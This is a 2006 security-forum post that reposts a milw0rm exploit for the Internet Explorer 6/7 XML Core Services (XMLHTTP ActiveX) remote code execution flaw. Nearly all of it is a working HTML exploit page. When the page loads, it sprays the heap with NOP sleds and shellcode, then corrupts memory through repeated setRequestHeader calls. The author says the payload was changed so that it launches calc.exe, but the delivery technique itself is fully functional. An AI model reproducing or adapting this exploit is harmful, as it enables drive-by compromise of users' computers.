邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » MS Internet Explorer 6/7 (XML Core Services) Remote Code Exec Exploit [查看完整版本]

zhouzhen 2006-11-9 20:53

MS Internet Explorer 6/7 (XML Core Services) Remote Code Exec Exploit

原创作者：n/a

[code]
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1 plus 2.0//EN">
<!--
MS Internet Explorer 6/7 (XML Core Services)  Remote Code Execution Exploit

Author: n/a

Info:
[url]http://blogs.securiteam.com/index.php/archives/721[/url]
[url]http://isc.sans.org/diary.php?storyid=1823[/url]
[url]http://xforce.iss.net/xforce/alerts/id/239[/url]

Found in the wild and was pointed out on securiteam&#39;s blog (cheers Gadi Evron!)

Changed up the shellcode so it wouldn&#39;t be as evil for the viewers, calc.exe is called.

/str0ke
-->

<html xmlns="[url]http://www.w3.org/1999/xhtml[/url]">
<body>
<object id=target classid="CLSID:{88d969c5-f192-11d4-a65f-0040963251e5}" >
</object>
<script>
var obj = null;
function exploit() {
obj = document.getElementById(&#39;target&#39;).object;

try {
obj.open(new Array(),new Array(),new Array(),new Array(),new Array());
} catch(e) {};

sh = unescape ("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" +
   "%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" +
   "%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" +
   "%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" +
   "%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" +
   "%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" +
   "%uFF57%u63E7%u6C61%u0063");

sz = sh.length * 2;
npsz = 0x400000-(sz+0x38);
nps = unescape ("%u0D0D%u0D0D");
while (nps.length*2<npsz) nps+=nps;
ihbc = (0x12000000-0x400000)/0x400000;
mm = new Array();
for (i=0;i<ihbc;i++) mm[i] = nps+sh;

obj.open(new Object(),new Object(),new Object(),new Object(), new Object());   

obj.setRequestHeader(new Object(),&#39;......&#39;);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
}
</script>
<body onLoad=&#39;exploit()&#39; value=&#39;Exploit&#39;>

</body></html>

# milw0rm.com [2006-11-08]


[/code]

查看完整版本: MS Internet Explorer 6/7 (XML Core Services) Remote Code Exec Exploit

© 1999-2008 EvilOctal Security Team